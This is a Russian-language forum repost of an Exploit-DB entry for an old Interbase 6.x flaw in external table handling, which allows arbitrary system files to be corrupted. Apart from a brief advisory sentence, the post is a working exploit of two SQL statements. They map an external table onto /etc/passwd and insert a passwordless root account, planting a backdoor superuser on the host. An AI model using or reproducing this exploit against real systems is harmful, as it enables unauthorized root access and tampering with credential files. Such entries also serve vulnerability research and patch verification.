Exploit Interbase 6.x - External Table File Verification

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22462
Проверка EDB
  1. Пройдено
Автор
KOTALA ZDENEK
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2003-04-05
Код:
source: https://www.securityfocus.com/bid/7291/info

A vulnerability has been reported for Interbase that may result in the corruption of arbitrary system files. The vulnerability exists due to insufficient checks performed when creating or manipulating external databases. 

create table test external '/etc/passwd' (id char(80));
insert into test values('r00t::0:0:root:/root:/bin/bash');
 
Источник
www.exploit-db.com

Похожие темы